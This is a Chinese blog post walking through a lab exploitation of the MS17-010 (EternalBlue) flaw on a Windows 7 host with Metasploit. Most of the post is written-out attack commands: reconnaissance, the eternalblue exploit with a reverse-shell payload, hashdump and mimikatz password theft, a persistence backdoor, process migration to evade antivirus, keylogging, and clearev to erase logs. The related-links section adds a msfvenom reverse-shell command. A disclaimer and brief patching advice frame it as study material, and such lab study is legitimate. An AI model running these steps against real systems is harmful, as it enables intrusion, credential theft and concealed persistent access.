版本永恒之蓝_永恒之蓝漏洞利用

最新推荐文章于 2023-10-25 22:43:25 发布
最新推荐文章于 2023-10-25 22:43:25 发布
阅读量275 收藏
点赞数
文章标签: 版本永恒之蓝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39756696/article/details/112715742
版权

#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为

永恒之蓝漏洞利用

实验环境

客户机(win7 ip:192.168.0.105)

攻击机(kali ip:192.168.0.101)

具体步骤

查看局域网设备

使用netdiscover 查看局域网的设备

95daba58f7249aac22a599109b32e978.png

如上图所示,搜索到了一台IP为192.168.0.103的设备

使用 nmap 扫描

root@WHOAMI:~# nmap -sS -A -p- -v -O 192.168.0.103

-sS 半开扫描

-A 全面系统检测、启用脚本检测、扫描等

-p- 扫描全部开放的端口

-v 显示扫描过程,

-O 启用远程操作系统检测,存在误报

扫描结果如下图

fc00bbb44def07e5aa5c7f320da0ac13.png
82a27477c1d0bbc67480a49b25e15c66.png

发现目标机器开放的端口还有Windows 7操作系统

对主机进行扫描确认是否存在漏洞

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.0.103

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

4873b08791396732deb834bb279dfc5f.png

上图中出现- Host is likely VULNERABLE to MS17-010!说明客户机存在MS17-010漏洞下面开始漏洞利用

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.103

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

b18468e39f360b8302deecba2a2aeb73.png

连接成功

c8aea11f31cb10a56bc43ccc300b3f2e.png

查看权限

meterpreter > getuid

6afa5eac2029398b4f96b158672443bb.png

查看登录的用户的明文密码

使用命令 run hashdump 加载 hashdump 模块

e7f8769b661bd6b1c6ea2628e1d0462a.png

使用命令 load mimikatz 加载 mimikatz 模块,再使用 help mimikatz

77d2845fd7137369ae42f07028fcf958.png

使用 wdigest 命令获取登录过的用户储存在内存里的明文密码

a7997d460d644a4f39f52e7d6ca0bfa7.png

查看分区

run post/windows/gather/forensics/enum_drives

37b1bae3c2e89297008444223deaf31c.png

查看补丁信息

67ff885931383a59cd2cdb0c1ee95843.png

给 win7 留后门

使用命令 run persistence -X -i 10 -r 192.168.0.101 -p 444

887f7bdf8d4e085831c9af4f756e4c70.png

再开启一个 msf

加载 handler 模块

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.0.101

msf5 exploit(multi/handler) > set LPORT 444

msf5 exploit(multi/handler) > run

如下图成功在444端口监听到一个会话

6ebcc241d5c29c20e199d262eb0bfcb2.png

Metasploit 键盘记录

ps查看进程

af8acac27d39957894d56874146ed400.png

将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀毒软件

653fc58e3bbb6ba18440358e34f07227.png

最后,我们启动键盘记录器,等待一段时间并转储输出。

ee659464d6ca66fe9c1f9e9857c11c1c.png

清除痕迹

在渗透入侵的过程中难免会留下一下日志信息痕迹,我们可以使用此命令来擦除留下的痕迹

使用clearev

3637e1bf0da3bfd77f1b583c7851bb05.png

解决措施

·及时打补丁

·安装杀毒软件自动更新补丁

#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为

weixin_39756696
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝的复现与利用
m0_66890717的博客
04-14 1478
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。2、漏洞原理:永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
永恒之蓝 利用(复现)
nszmsjhshs的博客
03-11 6557
永恒之蓝早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。这还没让我们对它得到重视,然而随后发生的一件事让它就此名声大噪或者说臭名昭著,那就是用它加以改造的wannacry 勒索病毒。它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支
ms17-010永恒之蓝漏洞利用,渗透同一局域网下的windows7
m0_63533079的博客
03-08 1839
利用window7存在的ms17-010漏洞进行复现演示
漏洞复现-永恒之蓝(MS17-010)
qq_60848021的博客
09-19 3015
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
Windows下永恒之蓝(MS17-010)漏洞的复现分析
qq_51331767的博客
01-11 1922
Windows下的MS17-010(永恒之蓝)的复现与分析
win2012R2永恒之蓝安全补丁.zip
05-12
永恒之蓝漏洞源自微软的SMB(Server Message Block)服务,这是一个允许网络上的计算机共享文件、打印机和网络资源的协议。该漏洞(CVE-2017-0144和CVE-2017-0145)允许远程代码执行,使得攻击者无需用户交互即可...
永恒之蓝检测.zip
10-20
2. **WannaCry勒索软件**:利用永恒之蓝漏洞,WannaCry在全球范围内快速扩散,通过自我复制的方式感染计算机,并对用户数据进行加密,然后要求支付赎金以解锁。 3. **预防措施**:为了防止永恒之蓝攻击,首先需要...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝漏洞 ms17_010 详解
最新发布
qq_45953122的博客
10-25 5590
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
永恒之蓝复现-附带win7虚拟机安装教程
dangejinghong的博客
09-03 1345
以上就是我对永恒之蓝的复现MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法_RDrug的博客-CSDN博客MS17-010漏洞复现(带win7虚拟机安装,零基础)永恒之蓝镜像墨言ink的博客-CSDN博客从大佬的博客中学到很多,也对这个漏洞更加了解。
永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 4115
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝”漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
win7系统smb永恒之蓝【漏洞复现】
鹅子鱼的博客:很菜但是很好学的小菜鸟
12-21 2240
win7系统smb永恒之蓝【漏洞复现】
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
MS17-010 永恒之蓝漏洞利用方式
weixin_51339377的博客
03-17 6727
Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux 192.168.109.130 目标靶机:windows7 192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态 nmap -p 80,3...
永恒之蓝--Windows7
chang113的博客
06-20 1162
永恒之蓝--Windows7
永恒之蓝漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
利用Metasploit的永恒之蓝漏洞渗透win10
05-02
永恒之蓝漏洞是一个远程代码执行漏洞,它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。该漏洞可以使攻击者通过网络获取Windows系统的控制权,而无需进行身份验证。 以下是使用Metasploit进行永恒之蓝漏洞渗透...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值